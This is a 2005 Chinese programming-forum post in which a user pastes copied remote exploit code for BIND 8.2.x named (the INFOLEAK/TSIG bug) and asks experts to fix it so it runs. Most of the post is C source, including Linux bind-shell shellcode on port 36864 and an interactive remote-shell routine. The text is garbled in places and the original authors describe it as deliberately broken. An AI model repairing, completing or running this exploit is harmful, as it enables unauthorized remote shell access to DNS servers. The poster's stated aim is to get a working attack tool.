ChenFengqing 2005年03月18日
小弟想搞定这个调试不了的程序,请教高手揭贴,NB的人只管进,希望揭贴的时候就可以用来调试,这是个黑客攻击程序(复制得来的),不知道
BIND8.2.x的exploit代码

/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <ian@cypherpunks.ca>
* Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [adresadeforward@yahoo.com] (the master of jmpz),
* lucysoft [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see
http://www.isc.org/products/BIND/bind-security.html
)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <anathema@hack.co.za> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define max(a,b) ((a)>(b)?(a)
b))

#define BUFFSIZE 4096

int argevdisp1, argevdisp2;

char shellcode[] =/*
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"xebx44" /* jmp intr */ // 2 - 2
/* start: */
"x5e" /* popl %esi */ // 1 - 3

/* socket() */
"x29xc0" /* subl %eax, %eax */ // 2 - 5
"x89x46x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"x40" /* incl %eax */ // 1 - 9
"x89xc3" /* movl %eax, %ebx */ // 2 - 11
"x89x46x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"x40" /* incl %eax */ // 1 - 15
"x89x46x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"x8dx4ex08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"xb0x66" /* movb $0x66, %al */ // 2 - 23
"xcdx80" /* int $0x80 */ // 2 - 25

/* bind() */
"x43" /* incl %ebx */ // 1 - 26
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"x88x46x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"x29xc0" /* subl %eax, %eax */ // 2 - 39
"x89xc2" /* movl %eax, %edx */ // 2 - 41
"x89x46x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"xb0x90" /* movb $0x90, %al */ // 2 - 46
"x66x89x46x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"x8dx4ex14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"x8dx4ex08" /* leal 0x08(%esi), %ecx */ // 3 - 59

"xebx02" /* jmp cont */ // 2 - 2
/* intr: */
"xebx43" /* jmp callz */ // 2 - 4

/* cont: */
"xb0x66" /* movb $0x66, %al */ // 2 - 6
"xcdx80" /* int $0x80 */ // 2 - 10

/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"x43" /* incl %ebx */ // 1 - 12
"x43" /* incl %ebx */ // 1 - 13
"xb0x66" /* movb $0x66, %al */ // 2 - 15
"xcdx80" /* int $0x80 */ // 2 - 17

/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"x89x56x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"xb0x66" /* movb $0x66, %al */ // 2 - 25
"x43" /* incl %ebx */ // 1 - 26
"xcdx80" /* int $0x80 */ // 1 - 27

/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */ // 2 - 29
"xb0x3f" /* movb $0x3f, %al */ // 2 - 31
"x29xc9" /* subl %ecx, %ecx */ // 2 - 33
"xcdx80" /* int $0x80 */ // 2 - 35
"xb0x3f" /* movb $0x3f, %al */ // 2 - 37
"x41" /* incl %ecx */ // 1 - 38
"xcdx80" /* int $0x80 */ // 2 - 40
"xb0x3f" /* movb $0x3f, %al */ // 2 - 42
"x41" /* incl %ecx */ // 1 - 43
"xcdx80" /* int $0x80 */ // 2 - 45

/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"x89x76x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"x87xf3" /* xchgl %esi, %ebx */ // 2 - 53
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"xb0x0b" /* movb $0x0b, %al */ // 2 - 58
"xcdx80" /* int $0x80 */ // 2 - 60

"x90"

/* callz: */
"xe8x72xffxffxff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13

unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;

if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}

int dumpbuf(char *buff, int len)
{
char line[17];
int x;

/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf(" %s
", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("
");
}

void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;

fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;
", 15, 0);

for(;

{

FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);

if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}

if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed
");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}

if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss
");
exit(EXIT_FAILURE);
}
}
}
}


connection(struct sockaddr_in host)
{
int sockd;

host.sin_port = htons(36864);

printf("
  • connecting..
    "
  • );
    usleep(2000);

    if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
    exit(EXIT_FAILURE);
    }

    if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
    {
    printf("
  • wait for your shell..
    "
  • );
    usleep(500);
    runshell(sockd);
    }
    else
    {
    printf("[x] error: named not vulnerable or wrong offsets used
    ");
    }

    close(sockd);
    }
    #################################################################################下面也是


...全文
84 点赞 收藏 6
写回复
6 条回复

还没有回复,快来抢沙发~

发动态
发帖子
VC/MFC
创建于2007-09-28

7872

社区成员

42.1w+

社区内容

VC/MFC相关问题讨论
社区公告
暂无公告